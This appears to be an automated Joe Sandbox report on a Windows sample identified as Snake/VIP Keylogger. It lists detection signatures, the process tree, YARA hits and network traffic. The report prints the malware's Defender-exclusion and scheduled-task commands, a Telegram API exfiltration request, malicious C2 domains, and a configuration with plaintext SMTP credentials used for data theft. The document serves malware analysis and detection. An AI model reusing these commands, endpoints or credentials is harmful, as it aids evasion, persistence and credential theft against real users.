Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WIpGif4IRrFfamQ.exe

Overview

General Information

Sample name:WIpGif4IRrFfamQ.exe
Analysis ID:1523246
MD5:102c9ce1c659517c4ea924c2044305b7
SHA1:942b0a7e2077eca38b9b6ff16d89722cbbbf7002
SHA256:b31cbc6ec2eb2b790c422f0f960bb1436106d92958703cb005ccdef38887e310
Tags:exeSnakeKeyloggeruser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • WIpGif4IRrFfamQ.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe" MD5: 102C9CE1C659517C4EA924C2044305B7)
    • powershell.exe (PID: 5052 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AcEnrS.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7460 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3180 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WIpGif4IRrFfamQ.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe" MD5: 102C9CE1C659517C4EA924C2044305B7)
  • AcEnrS.exe (PID: 7400 cmdline: C:\Users\user\AppData\Roaming\AcEnrS.exe MD5: 102C9CE1C659517C4EA924C2044305B7)
    • schtasks.exe (PID: 7616 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp6B55.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AcEnrS.exe (PID: 7708 cmdline: "C:\Users\user\AppData\Roaming\AcEnrS.exe" MD5: 102C9CE1C659517C4EA924C2044305B7)
      • WerFault.exe (PID: 8048 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7708 -s 1500 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "hnosgomezrecambios@pymetal.net", "Password": "21hnosgomezrecambios2021", "Host": "mail.pymetal.net", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "hnosgomezrecambios@pymetal.net", "Password": "21hnosgomezrecambios2021", "Host": "mail.pymetal.net", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000009.00000002.4473996288.0000000002F1A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2e68a:$a1: get_encryptedPassword
          • 0x2e9a7:$a2: get_encryptedUsername
          • 0x2e49a:$a3: get_timePasswordChanged
          • 0x2e5a3:$a4: get_passwordField
          • 0x2e6a0:$a5: set_encryptedPassword
          • 0x2fd1f:$a7: get_logins
          • 0x2fc82:$a10: KeyLoggerEventArgs
          • 0x2f8e7:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 26 entries
          SourceRuleDescriptionAuthorStrings
          0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2ca8a:$a1: get_encryptedPassword
                • 0x2cda7:$a2: get_encryptedUsername
                • 0x2c89a:$a3: get_timePasswordChanged
                • 0x2c9a3:$a4: get_passwordField
                • 0x2caa0:$a5: set_encryptedPassword
                • 0x2e11f:$a7: get_logins
                • 0x2e082:$a10: KeyLoggerEventArgs
                • 0x2dce7:$a11: KeyLoggerEventArgsEventHandler
                0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3a8b6:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x39f59:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x3a1b6:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3ab95:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 54 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", ParentImage: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe, ParentProcessId: 6600, ParentProcessName: WIpGif4IRrFfamQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", ProcessId: 5052, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", ParentImage: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe, ParentProcessId: 6600, ParentProcessName: WIpGif4IRrFfamQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", ProcessId: 5052, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp6B55.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp6B55.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\AcEnrS.exe, ParentImage: C:\Users\user\AppData\Roaming\AcEnrS.exe, ParentProcessId: 7400, ParentProcessName: AcEnrS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp6B55.tmp", ProcessId: 7616, ProcessName: schtasks.exe
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 75.102.58.14, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe, Initiated: true, ProcessId: 7308, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49745
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", ParentImage: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe, ParentProcessId: 6600, ParentProcessName: WIpGif4IRrFfamQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp", ProcessId: 3180, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", ParentImage: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe, ParentProcessId: 6600, ParentProcessName: WIpGif4IRrFfamQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", ProcessId: 5052, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", ParentImage: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe, ParentProcessId: 6600, ParentProcessName: WIpGif4IRrFfamQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp", ProcessId: 3180, ProcessName: schtasks.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T10:55:04.725323+020028033053Unknown Traffic192.168.2.549711188.114.97.3443TCP
                2024-10-01T10:55:33.647819+020028033053Unknown Traffic192.168.2.549736188.114.97.3443TCP
                2024-10-01T10:55:36.431164+020028033053Unknown Traffic192.168.2.549743188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T10:55:00.305766+020028032742Potentially Bad Traffic192.168.2.549707193.122.6.16880TCP
                2024-10-01T10:55:04.199520+020028032742Potentially Bad Traffic192.168.2.549707193.122.6.16880TCP
                2024-10-01T10:55:16.227656+020028032742Potentially Bad Traffic192.168.2.549713193.122.6.16880TCP
                2024-10-01T10:55:24.758931+020028032742Potentially Bad Traffic192.168.2.549722193.122.6.16880TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                Source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "hnosgomezrecambios@pymetal.net", "Password": "21hnosgomezrecambios2021", "Host": "mail.pymetal.net", "Port": "587", "Version": "4.4"}
                Source: 14.2.AcEnrS.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "hnosgomezrecambios@pymetal.net", "Password": "21hnosgomezrecambios2021", "Host": "mail.pymetal.net", "Port": "587", "Version": "4.4"}
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeReversingLabs: Detection: 47%
                Source: WIpGif4IRrFfamQ.exeReversingLabs: Detection: 47%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeJoe Sandbox ML: detected
                Source: WIpGif4IRrFfamQ.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: WIpGif4IRrFfamQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49744 version: TLS 1.2
                Source: WIpGif4IRrFfamQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.ni.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: System.pdbMZ@ source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: @o.pdb source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.ni.pdbRSDS source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl=neutral source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: n(C:\Windows\UJLf.pdb source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb'Pw source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\UJLf.pdbSpyv source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Roaming\UJLf.pdbe source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdbRSDS source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: !!.pdb source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\UJLf.pdbpdbJLf.pdbN source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: UJLf.pdb?? source: AcEnrS.exe, 0000000E.00000002.2401454190.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: UJLf.pdb source: WIpGif4IRrFfamQ.exe, AcEnrS.exe.0.dr
                Source: Binary string: C:\Users\user\AppData\Roaming\AcEnrS.PDB source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Xml.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: System.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: System.Core.ni.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: ?oC:\Users\user\AppData\Roaming\UJLf.pdby source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: UJLf.pdbSHA256 source: WIpGif4IRrFfamQ.exe, AcEnrS.exe.0.dr
                Source: Binary string: UJLf.pdbs\UJLf.pdbpdbJLf.pdbUJLf.pdb source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\UJLf.pdb<S%v source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\UJLf.pdbM source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, WER7D66.tmp.dmp.18.dr
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.pdb;( source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: mscorlib.ni.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: \??\C:\Users\user\AppData\Roaming\UJLf.pdbL source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\UJLf.pdb= source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: ysymbols\exe\UJLf.pdbow source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.ni.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WER7D66.tmp.dmp.18.dr
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 07738B02h0_2_07738237
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 013FF2EDh9_2_013FF150
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 013FF2EDh9_2_013FF33C
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 013FFAA9h9_2_013FF804
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 06B60D0Dh9_2_06B60B30
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 06B61697h9_2_06B60B30
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 06B631E8h9_2_06B62DD0
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 06B62C21h9_2_06B62970
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 06B6F8C9h9_2_06B6F620
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06B60673
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 06B6FD21h9_2_06B6FA78
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 06B6DA61h9_2_06B6D7B8
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 06B6D1B1h9_2_06B6CF08
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 06B6D609h9_2_06B6D360
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 06B6E769h9_2_06B6E4C0
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 06B6DEB9h9_2_06B6DC10
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 06B6E311h9_2_06B6E068
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06B60853
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06B60040
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 06B631E8h9_2_06B62DCA
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 06B6F471h9_2_06B6F1C8
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 06B631E8h9_2_06B63116
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 06B6EBC1h9_2_06B6E918
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 4x nop then jmp 06B6F019h9_2_06B6ED70
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeCode function: 4x nop then jmp 090179AAh10_2_090170DF

                Networking

                barindex
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.5:49745 -> 75.102.58.14:587
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20and%20Time:%2002/10/2024%20/%2021:40:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20065367%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewASN Name: SERVERCENTRALUS SERVERCENTRALUS
